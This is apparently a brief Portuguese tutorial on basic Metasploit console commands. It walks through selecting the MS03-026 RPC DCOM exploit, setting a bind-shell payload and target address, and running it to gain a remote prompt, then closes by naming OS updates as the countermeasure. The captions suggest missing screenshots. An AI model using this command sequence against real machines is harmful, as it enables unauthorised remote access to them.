A seguir alguns comandos básicos do potente Framework para testes de vulnerabilidades, o Metasploit.
Acessando o Framework:
Executando o “./msfconsole”:
Buscando ajuda com o comando, “help”:
Visualizando Exploits disponíveis na base com o comando, “show exploits” :
Utilizando o comando “search” para pesquisar determinado exploit:
Obtendo informações sobre o exploit com o comando, “info” :
Explorando uma máquina vulnerável a RPC DCOM com o comando, “use windows/dcerpc/ms03_026_dcom :
Verificando quem é vulnerável com o comando, “show targets”:
Verificando payloads disponíveis para o ataque com o comando, “show payloads”:
Setando um payload para o ataque com o comando, “set payload generic/shell_bind_tcp” :
Checando opções de uso com o comando, “show options” :
Setando o alvo com o comando, “set RHOST ip_do_alvo” :
Executando o Exploit e ganhando o prompt com o comando, “exploit”:
Contramedidas : Atualização do Sistema Operacional.
Até a próxima !
